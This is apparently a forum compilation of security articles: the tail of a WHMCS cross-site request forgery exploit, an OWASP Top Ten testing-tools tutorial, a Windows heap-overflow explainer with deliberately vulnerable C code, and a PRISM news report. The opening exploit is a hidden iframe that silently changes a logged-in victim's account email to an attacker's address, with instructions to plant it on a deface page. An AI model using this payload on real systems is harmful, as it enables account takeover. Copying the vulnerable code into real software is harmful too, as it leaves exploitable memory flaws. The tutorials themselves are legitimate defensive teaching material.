src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe> ########################################################################### All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated. ########################################################################### Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker | c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de | makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark | Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members ########################################################################### http://www.MaDLeeTs.com ########################################################################### Sursa: WHMCS Cross Site Request Forgery ? Packet Storm
-
Encryption At The Software Level: Linux And Windows

Description: In this video, Mark Stanislav from Due Security discusses encryption for Linux, and Farooq Ahmed, Development Manager of Online Tech, discusses encryption for Windows.

Encryption: Changing plain text into cipher text in order to make the original data unreadable to anyone not possessing knowledge of the decryption algorithm and any required key.

For More Information Please Visit: Compliant Cloud | Colocation | Managed Servers | Disaster Recovery

Sursa: Encryption At The Software Level: Linux And Windows
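The definition quoted above can be made concrete in a few lines. This toy XOR one-time pad (an illustration of the definition only, not the production-grade encryption the video covers) renders the data unreadable without the key, and reapplying the key recovers the plaintext:

```python
import secrets

def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR each plaintext byte with a key byte; XOR-ing again undoes it.
    return bytes(b ^ k for b, k in zip(data, key))

plaintext = b"attack at dawn"
key = secrets.token_bytes(len(plaintext))  # one-time pad: key as long as the message

ciphertext = xor_cipher(plaintext, key)
recovered = xor_cipher(ciphertext, key)
assert recovered == plaintext  # only a key holder can reverse the transformation
```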
-
Ssl Traffic Analysis Attacks - Vincent Berg

Description: The talk will focus on modern SSL traffic analysis attacks. Although these attacks have been known and great papers have been published about them, most people are still not aware of the lengths an attacker can go to in order to extract useful information from SSL sessions. By showing some large targets and some useful progress in that space, it is hoped that the audience will gain a better understanding of what SSL traffic analysis is, that it is a real threat (depending on the skills of the assumed adversary), and some knowledge of how to try and avoid these types of attacks. There will be a bunch of research tools accompanying the talk, with at least one being a proof of concept of how to do traffic analysis on Google Maps.

For more information, please visit: Breakpoint 2012 Speakers List

Sursa: Ssl Traffic Analysis Attacks - Vincent Berg
-
[h=1]OWASP Top Ten Testing and Tools for 2013[/h]

Jonathan Lampe
June 27, 2013

In 2013 OWASP completed its most recent regular three-year revision of the OWASP Top 10 Web Application Security Risks. The Top Ten list has been an important contributor to secure application development since 2004, and was further enshrined after it was included by reference in the Payment Card Industry Security Standards Council's Data Security Standards, better known as the PCI-DSS.

Surprisingly, there were only a few changes between the 2010 Top Ten and 2013 Top Ten lists, including one addition, several reorders and some renaming. The most prevalent theme was probably that both cross-site scripting (XSS) and cross-site request forgery (CSRF) dropped in importance: XSS dropping apparently because safer scripting libraries are becoming more widespread, and CSRF dropping because these vulnerabilities are not as common as once thought.

In any case, the current entries in the OWASP Top Ten Web Application Security Risks for 2013 are:

[*] A1: Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

[*] A2: Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users' identities.

[*] A3: Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
[*] A4: Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data. [*] A5: Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server and platform. All these settings should be defined, implemented and maintained as many are not shipped with secure defaults. This includes keeping all software up to date. [*] A6: Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, SSNs, tax IDs and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes. Sensitive data deserves extra protection such as encryption at rest or encryption in transit, as well as special precautions when exchanged with the browser. [*] A7: Missing Function Level Access Control Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality. [*] A8: Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. 
[*] A9: Using Components with Known Vulnerabilities Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts. [*] A10: Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing, malware sites or use forwards to access unauthorized pages. This is the fourth edition of a list that comes out every three years, and with the limited changes between 2010 and 2013 it is fair to say that OWASP’s popular Top Ten list has matured. With maturity and popularity, automation and utilities that directly address the items on the list have arrived, and some of the best are summarized in the chart below. 
[TABLE] [TR] [TD]WEB APPLICATION RISK[/TD] [TD]SECURITY UTILITY[/TD] [/TR] [TR] [TD]A1: Injection[/TD] [TD]SQL Inject Me and Zed Attack Proxy (ZAP)[/TD] [/TR] [TR] [TD]A2: Broken Authentication and Session Management[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A3: Cross-Site Scripting (XSS)[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A4: Insecure Direct Object References[/TD] [TD]HTTP Directory Traversal Scanner, Burp Suite and ZAP[/TD] [/TR] [TR] [TD]A5: Security Misconfiguration[/TD] [TD]OpenVAS and WATOBO[/TD] [/TR] [TR] [TD]A6: Sensitive Data Exposure[/TD] [TD]Qualys SSL Server Test[/TD] [/TR] [TR] [TD]A7: Missing Function Level Access Control[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A8: Cross-Site Request Forgery (CSRF)[/TD] [TD]Tamper Data (Samurai WTF), WebScarab or ZAP[/TD] [/TR] [TR] [TD]A9: Using Components with Known Vulnerabilities[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A10: Unvalidated Redirects and Forwards[/TD] [TD]ZAP[/TD] [/TR] [/TABLE] Those of you who read Russ McRee’s 2010 Top Ten security tools article will notice that most of the tools listed here were also identified in his 2010 survey. However, my approach differs from McRee’s in terms of breadth; whereas McRee aimed to provide a different tool for each of the top ten items, I aim to provide you with a smaller number of tools that should cover most of the top ten so you can concentrate your efforts on mastering fewer tools that do more. Along those lines, it is worth noting that several of my recommended tools, notably the Zed Attack Proxy (ZAP) and new entrant OpenVAS, have increased the breadth of their services to cover more Top Ten items since their original release. In fact, it may be worth taking a closer look at additional capabilities of any recommended tool on this list because many of these tools are still under active development. (For example, WATOBO now has a SQL injection probe, although I haven’t explored it far enough to recommend it yet.) 
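As a reminder of what the automated injection probes in these tools actually send, here is a minimal, self-contained sketch (assumptions: a hypothetical one-row users table, with Python's sqlite3 standing in for a real backend). A string-built query lets the classic tautology payload rewrite the WHERE clause, while a parameterized query treats the same bytes as inert data:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "' OR '1'='1"  # classic tautology probe, the kind SQL Inject Me automates

# Vulnerable: attacker-controlled text is concatenated into the statement,
# producing SELECT * FROM users WHERE name = '' OR '1'='1'
vulnerable = "SELECT * FROM users WHERE name = '%s'" % payload
rows_vulnerable = conn.execute(vulnerable).fetchall()
print(len(rows_vulnerable))  # 1 -- the tautology matched every row

# Safe: a placeholder keeps the payload as data, so nothing matches.
rows_safe = conn.execute("SELECT * FROM users WHERE name = ?", (payload,)).fetchall()
print(len(rows_safe))  # 0
```

Scanners report a detect when responses to payloads like this differ from the baseline response, which is why parameterized applications come back clean.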
[h=1]Two Main Types of Web Vulnerability Tools[/h]

If you scan the chart you will notice that two tools are mentioned the most: OWASP's Zed Attack Proxy (ZAP) and OpenVAS. These two tools represent two different classes of application scanning that every security researcher should familiarize himself or herself with.

First, there are the tools that look for common misconfigurations and outdated software, including default settings, sample content, insecure configurations, and old versions that harbor known vulnerabilities. These tools are represented in the chart above by OpenVAS, an open source project with several heavyweight sponsors including the government of Germany. Similar tools include Tenable's Nessus and eEye's Digital Security Retina, and perhaps about two dozen more actively developed open source projects and commercial products.

Second, there are the tools that help dig into specific web applications by automating SQL injection, authentication, session, XSS, directory traversal, redirect and other probes for common and serious vulnerabilities. These tools are represented in the chart above by ZAP. Most of these tools, including ZAP, use a combination of a local web proxy, web session recorder, web playback and thousands of variations on input manipulation to look for vulnerabilities. Similar tools include HP WebInspect, IBM AppScan (originally by WatchFire), dozens of other general-purpose web vulnerability scanners and hundreds of specific case utilities.

[h=1]Other Web Vulnerability Tools[/h]

In addition to these two main types of tools, most security practitioners will find themselves drawn to additional tools that allow them to dig further into certain classes of vulnerabilities. For example, the "other tools" in my list were selected to cover areas where I worried about the thoroughness of my main tools, or where I wanted a second pair of eyes because of the risk.
Your list of "other tools" will vary depending on the specific capabilities of your main tools, the needs of your clients or employer, your available operating systems and many other factors, but I selected mine for a few specific reasons.

SQL Inject Me for #1 Injection – Although ZAP covers this, I selected a second tool to give me a second pair of eyes on this most common and deadly of vulnerabilities. (I never want to be caught with my pants down on OWASP's #1 vulnerability.)

HTTP Directory Traversal Scanner and Burp Suite for #4 Insecure Direct Object References – Although ZAP also covers this item, I like the breadth of scan and the output provided by either of these tools much more than ZAP's breadth and output.

WATOBO for #5 Security Misconfiguration – This is the highest-rated item that known vulnerability scanners like OpenVAS can detect. I wanted a second pair of eyes to make sure I am detecting more configuration issues, and to get a second opinion on questionable detects.

Qualys SSL Server Test for #6 Sensitive Data Exposure – This could be my most controversial recommendation, but having dealt with the innards of SSL/TLS while developing several security products (including the FIPS 140 validation process with three different companies), I always feel like I have an incomplete picture of my SSL/TLS capabilities until I hit my app with Qualys's SSL Server Test. None of the other local tests I've found (or written on my own) have quite the breadth of this hosted test.

Tamper Data (Samurai WTF) and WebScarab for #8 Cross-Site Request Forgery (CSRF) – CSRF vulnerabilities can be surprisingly hard to pin down, because what often looks like a detect turns out to be a false positive, and what looks like a clean access denial often really changes something interesting on the backend. To chase these vulnerabilities down (to the point where they are reproducible) you usually need to master a local web proxy that can help you manipulate specific fields.
Two of the best are Tamper Data and WebScarab, and you will often find yourself switching to your favorite proxy after your main tool registers an initial detect. (Yes, I know ZAP is also a proxy, but it's not my favorite proxy; it's my favorite detector.)

One other tool that web security practitioners should be familiar with is OWASP's WebGoat package. This tool isn't a scanner, probe or proxy: instead, WebGoat is an intentionally insecure web application that we can probe with these and other web security tools.

[h=1]Specific Web Vulnerability Applications (Main Tools)[/h]

[h=2]Deep Probe Into Specific Applications: OWASP's Zed Attack Proxy (ZAP)[/h]

(Probes for Cross-Site Scripting, Injection, Sessions, Directory Traversal, Unvalidated Redirects and Forwards, and acts as a web proxy to locate CSRF and similar vulnerabilities.)

OWASP has recently sponsored the development of its own web application vulnerability scanner called the Zed Attack Proxy (or ZAP for short). It automatically spiders a target URL and looks for common vulnerabilities, especially issues with cookies, headers and cross-site scripting.

[h=3]Installing and Running Zed Attack Proxy[/h]

[*] Download and install the program from http://code.google.com/p/zaproxy/downloads/list
[*] Run the program from your Start menu
[*] When prompted, use the wizard to create an "SSL root certificate"
[*] Type in the URL of a target application in the "URL to attack" field on the "Quick Start" tab
[*] To avoid unwanted attention until you know what you're doing, please stick to "http://localhost" URLs, such as your local copy of WebGoat

Much of the power of ZAP comes from using it as an "inline" proxy rather than as an interactive application. To try this mode:

[*] Open "Tools | Options | Local proxy" and set the proxy port to an acceptable value (8080 is the default, but if you're running multiple proxies and web applications on your local machine, things can get a little crowded).
2. Open your web browser and set its proxy settings to "localhost" and port 8080 (or whatever you configured).
3. Browse to a few sites in the web browser.
4. Flip back to ZAP. Notice that the sites you visited (and a few referenced through advertisements and inclusions) are now listed in ZAP's "Sites" list.
5. Click the "History" tab in the lower half of ZAP. This will show the URLs that caused content to be added to ZAP's "Sites" list.

Once you have started to gather URLs in your sites list, you can expand them, gather more information about them, or actively attack them:

- In the "Sites" tab, find a URL of a web page that you recognize on a site that you know has more content. Select it and then click the "play" icon on the "Spider" tab at the bottom of the screen to follow the links on the page.
- To look for SQL injection or XSS vulnerabilities in a page, select the URL in the "Sites" tab and right-click it to list "Attack" options.
- To set your attack options (e.g. to just check for XSS and avoid SQL injection attacks), select "Analyse | Scan Policy…" to turn various tests on and off.

[h=2]Bad Configuration and Old Software Scanner: OpenVAS[/h]
(Probes for Security Misconfiguration, Missing Function Level Access Control, Using Components with Known Vulnerabilities.)

I took my original formal security training in the late 1990s, so I "grew up" on Nessus when it was still a free security scanning application. Since its switch to a commercial application, a handful of forks of the original Nessus code have carried on Nessus's original promise of a free remote security scanner. My favorite alternative to Nessus these days is the OpenVAS project, which counts among its backers the national government of Germany. As noted in my chart above, this project is best at finding security misconfigurations, missing function level access controls (formerly known as "failure to restrict URL access") and components with known vulnerabilities.
It includes some SQL injection and other probes to test application input, but since it is mainly designed to scan networks for machines with bad configuration and outdated software, I think you should use it the same way.

[h=3]Installing and Running OpenVAS[/h]

The OpenVAS software is available for several popular Linux distributions including CentOS, Fedora and Red Hat Enterprise Linux. It is also available as virtual appliances for Oracle VirtualBox and EMC VMware. Once installed, a web-based interface is available to guide you through the scanning process. You've likely seen the types of reports that this application generates before: they rate findings by severity and rank multiple machines from least secure to most secure depending on the number and severity of findings on each machine.

For more information, please see: http://www.openvas.org/

[h=1]Other Top Ten Web Application Vulnerabilities Utilities[/h]
[h=2]Injection Utility: Security Compass's SQL Inject Me[/h]

Even if you have moved to Chrome or Safari for your daily web browsing, it's hard to give up Firefox entirely because of its extensive library of add-ons. One of the best SQL injection tools available today is a Firefox add-on called "SQL Inject Me" from Security Compass.

[h=3]Installing and Running SQL Inject Me[/h]

1. Install and run the latest version of Firefox (I am currently using v20).
2. Install the add-on from: https://addons.mozilla.org/En-us/firefox/addon/sql-inject-me/

After installing the SQL Inject Me plug-in, follow these directions to use it:

1. Navigate to the page or application you want to test.
2. Right-click on the target page and select "Open SQL Inject Me Sidebar".
3. Once the sidebar is open, use the drop-down and buttons to perform specific attacks.

[h=2]Advanced Web Proxy and CSRF Utility: OWASP WebScarab[/h]

OWASP's WebScarab is a Java-based web proxy that displays and allows you to manipulate the specific fields that are passed between browser and server.
It is highly extensible, but you often need to know what you want to chase after, and how to code, to chase it with this tool. Further muddying this project is the fact that a "next generation" edition was started but has not been touched since 2011.

For more information, please see: https://www.owasp.org/index.php/WebScarab_Getting_Started or https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

[h=2]Insecure Direct Object Reference Utility: Burp Suite[/h]

Russ McRee's 2010 security tools article went into detail about how to use the Burp Suite to ferret out path and directory traversal issues. Path and directory traversal issues have been problematic for web servers and web applications since their inception, perhaps most famously in the 2000 IIS vulnerability that fed worms such as Nimda. Rather than repeat McRee's work with Burp Suite, I will just agree that Burp Suite is good.

For more information, please see: http://portswigger.net/burp/

[h=2]Insecure Direct Object Reference Utility: HTTP Directory Traversal Scanner[/h]

Another tool that I like for directory traversal issues is the free HTTP Directory Traversal Scanner by John Leitch, an independent application security consultant in Michigan. This tool hits a given URL with about ten thousand URL variants in an attempt to find a named file. It helpfully groups its results by return code and content, which makes it easy to find needles in haystacks.

For more information, please see: http://www.autosectools.com/Page/HTTP-Directory-Traversal-Scanner

[h=2]Security Misconfiguration Utility: WATOBO[/h]

Russ McRee's 2010 security tools article uses WATOBO to look for security misconfiguration issues, and the tool is still a good choice: it's open source and maintained by an active community.
For more information, please see: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page

[h=2]Sensitive Data Exposure Utility: Qualys SSL Server Test[/h]

I normally avoid web-based tools for application scanning for several reasons: the data may not be reported back only to me, the tools might be pulled or changed at any time, and they need to hit an Internet-facing application. However, I recommend Qualys's SSL Server Test page for testing the quality of your web application's HTTPS connection before and after deployment into production. Qualys tests for basic quality issues such as whether your server supports SSL 2.0, which ciphers are supported, and the strength of your server certificate. It also tests more advanced quality measures, such as whether or not client-initiated renegotiation is allowed and whether or not the BEAST attack would be mitigated.

For more information, please see: https://www.ssllabs.com/ssltest/index.html (This is a resource hosted by a third party. For maximum protection, only allow traffic from "ssllabs.com" to the target resource until the necessary issues are resolved.)

[h=2]CSRF Utility: Tamper Data (Samurai WTF)[/h]

A Tamper Data utility is available in the Samurai WTF collection and is part of Russ McRee's coverage of CSRF utilities in his 2010 security tools review. The "Tamper Data" plug-in for Firefox is not currently recommended because of ongoing stability issues with recent versions of Firefox. Instead, I currently recommend configuring Firefox (or Chrome or any other web browser) to use a web proxy such as WebScarab or ZAP, and then using the functions within the web proxy to manipulate individual cookies, headers, form fields and URLs.

[h=2]WebGoat: The Perfect Target[/h]

In addition to the top ten web vulnerability list, OWASP develops and distributes software that allows students and security professionals to practice their skills against a deliberately insecure web application.
The name of OWASP's tilting dummy is "WebGoat," and it is available in both .NET and Java editions.

[h=3]How to Download, Install and Set Up WebGoat on Windows[/h]

Although there is a .NET edition of WebGoat available for Windows platforms, I'll stick with the Java edition in this article because that edition supports Linux and Mac OS platforms in addition to Windows. The Java edition also appears to be the more actively developed application, as its official ambitions include growing into a security benchmarking platform and a honeypot.

[h=3]WebGoat Prerequisites[/h]

The Java edition of WebGoat requires Java, of course, and uses Tomcat to provide its web interface.

1. Download and install Oracle Java from http://www.java.com
   - Java Version 1.6 (a.k.a. "Java 6") is recommended
2. Download and install Tomcat from http://tomcat.apache.org/
   - Tomcat Version 6 is recommended
   - Tomcat Version 7 is supported but requires additional setup not documented here
3. Once installed, open http://localhost:8080/ to confirm that Tomcat is working
4. Once you confirm the service is working, stop the Tomcat service

[h=3]How to Install WebGoat[/h]

1. Download and unzip WebGoat from http://code.google.com/p/webgoat/downloads/list
   - Download the "Zip" file and unpack the contents into a local folder
2. Open your local folder and double-click "webgoat.bat"
   - A Java window labeled "Tomcat" will open and display messages
3. Once the "Server startup in XXXXX ms" message appears, open http://localhost to confirm that you are hitting a live Tomcat application on port 80
4. Next, test WebGoat by opening http://localhost/WebGoat/attack. Sign on with username "guest" and password "guest" when prompted.

[h=3]How to Run WebGoat[/h]

1. Start WebGoat by opening http://localhost/WebGoat/attack.
2. Sign on with username "guest" and password "guest" when prompted.
3. Click the "Start WebGoat" button.

Sursa: InfoSec Institute Resources – OWASP Top Ten Testing and Tools for 2013
-
[h=1]Heap Overflow: Vulnerability and Heap Internals Explained[/h]ViperEye June 26, 2013

1. Introduction

A heap overflow is a form of buffer overflow; it happens when a chunk of memory is allocated to the heap and data is written to this memory without any bound checking being done on the data. This can lead to overwriting some critical data structures in the heap, such as the heap headers, or any heap-based data such as dynamic object pointers, which in turn can lead to overwriting the virtual function table. Here we'll see some details about the inner workings of the Windows heap, then move on to discuss how a heap overflow vulnerability occurs. The paper will start with basic information on how Windows heap management is done and then move on to understanding the vulnerability.

2. Windows Heap Basics

Windows has two kinds of heap:

- Default heap
- Dynamic heap

The default heap is used by the win32 subsystem to manage and allocate memory for local and global variables and for local memory management functions [malloc()]. A dynamic heap is created by functions such as HeapCreate(), which return a handle/address to a memory chunk that contains the heap header; the information in this header includes the segment table, virtual allocation list, free list usage bitmap, free list table, lookaside table, etc. This data is used by heap allocation functions such as HeapAlloc() and HeapReAlloc(), which allocate memory from this particular heap. As we can see from the above image, the PEB stores the details of the heaps initialized in the system. This can be useful in enumerating heaps in the system. The above image shows the structure of the heap header. Next we will take a look at some of the important data structures in the heap that will help us understand the heap exploit better.
Among the fields of the heap header are:

- Segment List
- Virtual Allocation List
- Free List
- Pointer to Lookaside List

The one case where the heap is not used is when the allocation is greater than the virtual allocation threshold (0xFE00 granules of 8 bytes, roughly 512 KB); in this case, the allocation is done in virtual memory by VirtualAlloc(). Let's see how this happens: The above image shows how the heap allocation is done; certain constraints are verified before passing the request forward. As we can see, all the calculation is done in units of 8 bytes, so the size of an allocated block is always divisible by 8; we can also conclude from the code that there cannot exist a block of 8 bytes, because with its header the smallest chunk already amounts to 16 bytes.

Here's the decision path during the heap allocation process:

1. If the block size is less than 1024 bytes, check the lookaside list; if there are no free entries there, check the free list. If the block size is greater than 1024 bytes, go to step 2.
2. Check whether the memory to be allocated is greater than the virtual allocation threshold of 0xFE00 granules (~512 KB). If it is not, the memory is allocated from the free list.
3. If it is, check whether the heap was created with a fixed size; if so, throw an error (STATUS_BUFFER_TOO_SMALL, 0xC0000023). If not, use ntdll.ZwAllocateVirtualMemory to allocate new memory.

Now let's look at how heap memory is freed; the path depends on whether the buffer is in the default heap or was virtually allocated.

If the buffer is in the default heap:

- Try to free it to the lookaside list, or
- Coalesce the buffer and place it on the free list.

If it is virtually allocated:

- Remove it from the busy list, or
- Free it back to the OS.
A buffer is freed to the lookaside list only if:

- There is a lookaside table
- The lookaside is not locked
- The requested size is smaller than 1024 bytes (to fit the table)
- The lookaside is not "full" yet

If the buffer can be placed on the lookaside list, its flags are kept set to busy and control returns to the caller. The other option is to coalesce the buffer and place it on the free list; this happens only if the buffer can't be freed to the lookaside list. Coalescing fails when:

- The freed buffer's flags & 0x80 is true
- The freed buffer is the first one (no backward coalesce)
- The freed buffer is the last one (no forward coalesce)
- The adjacent buffer is busy
- The total size of the two adjacent buffers is bigger than the virtual allocation threshold (0xFE00 * 8 bytes, ~512 KB)

The buffer is then inserted into the free list as follows:

- If the coalesced block size is < 1024, insert it into the proper free list entry.
- If the coalesced block size is > the de-commit threshold and the total heap free size is over the de-commit total free threshold, de-commit the buffer back to the OS.
- If the coalesced block is smaller than the virtual allocation threshold, insert the block into free list[0].
- If the coalesced block is bigger than the virtual allocation threshold, break the buffer into smaller chunks, each one as big as possible, and place them on free list[0].

Heap Overflows

Let's take a look at this rather simple example of a vulnerable function:

HANDLE h = HeapCreate(0, 0, 0); // default flags

DWORD vulner(LPVOID str)
{
    LPVOID mem = HeapAlloc(h, 0, 128);
    strcpy(mem, str);
    return 0;
}

As we can see, here the vulner() function copies data from the string pointed to by str into an allocated memory block pointed at by mem, without a bounds check. A string larger than 127 bytes passed to it will thereby overwrite the data coincidental to this memory block (which is, actually, the header of the following memory block). Each lookaside list entry has two pointers pointing to the entries before and after it, called the FLINK and BLINK pointers. The layout for a single lookaside entry is given below: So, when an overflow occurs, we can overwrite the FLINK and BLINK pointers.
Now let's modify the above code:

DWORD vulner(LPVOID str)
{
    HANDLE h = HeapCreate(0, 0, 0);
    LPVOID m1 = HeapAlloc(h, 0, 64);
    LPVOID m2 = HeapAlloc(h, 0, 128);
    HeapFree(h, 0, m1);
    HeapFree(h, 0, m2);
    // The above steps place the buffers in the lookaside list

    m1 = HeapAlloc(h, 0, 64);
    // This sets up the memory for an overwrite into the adjacent block
    memset(m1, 0x31, 64 + 16);

    m2 = HeapAlloc(h, 0, 128 - 8);
    return 0;
}

From the above code we can see that we have allocated two memory chunks and then freed them to the lookaside list; as mentioned above, any chunk below 1024-8 bytes will be sent to the lookaside list. After that, an allocation of 64 bytes is done again. This will move that memory back to the busy list. But, in this case, the 128-byte chunk will still be right next to the 64-byte chunk, so if we overflow the 64-byte chunk the data will write into the 128-byte chunk. In the next line we are overwriting with 64+16 bytes of data, which will overwrite the header and the FLINK and BLINK pointers of the 128-byte block. This is shown in the image below:

The whole process of unlinking is shown below:

Entry2->BLINK->FLINK = Entry2->FLINK
Entry2->FLINK->BLINK = Entry2->BLINK

So now, when the 128-byte buffer is allocated, it has already-corrupted FLINK and BLINK pointers, which can be in an attacker's control. The entry "Entry2->BLINK->FLINK" will be an attacker-controlled memory location; it can be overwritten with the value of Entry2->FLINK, which is also attacker-controlled.

Conclusion

This paper simply gives an understanding of the heap overflow process. The next article will give the details about how this vulnerability can be exploited.

Sursa: InfoSec Institute Resources – Heap Overflow: Vulnerability and Heap Internals Explained
-
[h=1]PRISM – Facts, Doubts, Laws and Loopholes[/h]Pierluigi Paganini June 24, 2013

[h=1]Introduction[/h]

Edward Snowden is the name of the 29-year-old technical assistant for the Central Intelligence Agency who disclosed the largest surveillance program implemented by the US, known as the PRISM program. For better or for worse, his name is destined to enter into history. The Guardian identified Edward Snowden as a technical assistant who has worked in US intelligence at the National Security Agency for the last four years as an employee of various defense contractors; currently he is an employee of the security defense contractor Booz Allen Hamilton. Snowden decided to reveal his identity because, like other whistleblowers such as Bradley Manning, the US Army soldier who was arrested in May 2010 in Iraq on suspicion of having passed classified material to the website WikiLeaks, he decided to make public an uncomfortable truth. The disclosure started with the publication of the secret court order to Verizon Communications, but that was just the tip of the iceberg. All of the principal US IT companies support the surveillance program PRISM, despite their top management denying it. The surveillance architecture monitors every activity on the Internet, and it has been ongoing for many years. Through it the US Government has obtained access to users' data, and private companies like Microsoft, Google, Facebook and Apple are all involved. Edward Snowden feared that the government would persecute him for disclosing top secret documentation on the extensive mass surveillance program PRISM. While I'm writing this, he is in a hotel in Hong Kong, where he flew after the publication of the presentation he prepared during his work in the NSA office in Hawaii around three weeks ago. Snowden decided to publish the history and proof of a program that every US citizen imagined existed, but that authorities and private companies always denied.
He left the US citing health reasons and flew to Hong Kong, the Chinese territory known also for its "strong tradition of free speech." According to the interview released to The Guardian, Edward Snowden is concerned, as he knows very well the power of intelligence agencies and the ramifications of his actions. He has thus barricaded himself in a hotel.

"I've left the room maybe a total of three times during my entire stay."
"I have no intention of hiding who I am, because I know I have done nothing wrong."
"I could be rendered by the C.I.A., I could have people come after me."
"We've got a C.I.A. station just up the road in the consulate here in Hong Kong, and I'm sure that they're going to be very busy for the next week, and that's a fear I'll live under for the rest of my life," Snowden said.

The confirmation of the existence of the PRISM program has shocked public opinion. Associations for the defense of freedom of expression and human rights are concerned about the violation of citizens' privacy, even if it is for homeland security reasons. The Obama administration is defending the surveillance program, saying it is necessary to prevent terrorist plots and that the debated data collection has already allowed the prevention of terrorist acts.

"Nobody is listening to your telephone calls. That's not what this program is about."
"In the abstract you can complain about Big Brother and how this is a potential program run amok, but when you actually look at the details, I think we've struck the right balance."
"You can't have 100 percent security and also then have 100 percent privacy and zero inconvenience."
"We're going to have to make some choices as a society. … There are trade-offs involved."

That is what the President told journalists during a visit to California's Silicon Valley. Edward Snowden considers himself a patriot, having served his country as a soldier in Iraq and recently working as a contractor for the CIA overseas.
He declared that he has carefully considered his actions and their possible consequences for the population, but nothing could be worse than what he witnessed. He carefully evaluated the documents he disclosed to ensure that no people would be harmed and that the public interest would be served.

"Anybody in positions of access with the technical capabilities that I had could, you know, suck out secrets to pass them on the open market to Russia."
"I had access to the full rosters of everyone working at the NSA, the entire intelligence community and undercover assets all around the world — the locations of every station we have, what their missions are."
"If I had just wanted to harm the U.S., you could shut down the surveillance system in an afternoon."

President Obama is in the eye of the storm. He was criticized by some members of Congress despite the revelation announced by the White House that the administration has held at least 13 briefings for Congress on the surveillance program operated by the NSA.

[h=1]The Fact – The PRISM Program[/h]

The Washington Post and the Guardian were the first newspapers to publish the news of how the US surveillance machine works. The NSA and FBI systematically access user information from the central servers of the leading IT companies. The list revealed that, contrary to the beliefs of many security experts, the extent of the monitoring network is larger:

- AOL
- Apple
- Dropbox
- Facebook
- Google
- PalTalk
- Skype
- Yahoo
- YouTube

The surveillance project began in 2007 and was supported by the Bush administration. It was known as PRISM and is capable of acquiring sensitive information from the IT majors and then operating complex analysis activities on it. The Washington Post published an article on the PRISM program reporting the top secret documents disclosed in Snowden's presentation. They revealed that PRISM has been referred to at least 1,477 times during government briefings on homeland security.
The document states that PRISM came into heavy use during the Arab Spring, when it was used to profile individuals considered dangerous to the US. The 41 slides composing the presentation, classified as top secret, claim "collection directly from the servers" of major US IT service providers, underscoring how much the intelligence community relies on this information for security purposes. The Guardian has verified the authenticity of the PowerPoint presentation that is circulating on the Internet. It is classified as top secret, with no distribution to foreign allies, and was apparently used to train operatives.

"Information collected under this program is among the most important and valuable foreign intelligence information we collect, and is used to protect our nation from a wide variety of threats. The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans," Director of National Intelligence James R. Clapper said.

All the companies named in the top secret document denied any knowledge of the secret program. The following are the principal comments on the disclosure:

"Google cares deeply about the security of our users' data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government 'back door' into our systems, but Google does not have a back door for the government to access private user data," stated Google.

